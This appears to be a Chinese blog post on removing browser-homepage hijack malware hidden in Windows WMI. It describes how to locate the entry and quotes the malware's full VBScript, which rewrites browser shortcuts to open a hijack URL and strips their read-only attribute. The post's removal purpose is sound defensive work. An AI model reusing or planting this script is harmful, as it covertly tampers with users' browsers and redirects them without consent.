此方法只适用于恶意软件在WMI中添加了恶意代码
感谢此片文章http://www.iefans.net/ie-zhuye-jiechi-www-2345-com-kunown作者,阅读下面前请先阅读此文,重复的地方不再复述。
本人跟上述文章中描述的情况差不多,但未在上述位置找到恶意代码,后来猜测恶意代码移了位置,果不其然,终被发现,为防止再次移位置,下面简述如何寻找。
右击“我的电脑”->"管理"->"服务和应用程序"->右击“WMI控件”->"属性"->"安全"选项卡->“Root”里面就是WMI所包含的所有文件夹,我这次是在Root\CIMV2中找到的,如果你们未在上述位置找到,可以通过WMI Tools逐个文件夹查找(子文件夹别漏了),我这次ScriptText中的代码是
On Error Resume Next:Const link = "http://hao.169x.cn/?v=108":Const link360 = "http://hao.169x.cn/?v=108&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\vip\Desktop,C:\Users\vip\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\vip\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\vip\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\vip\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
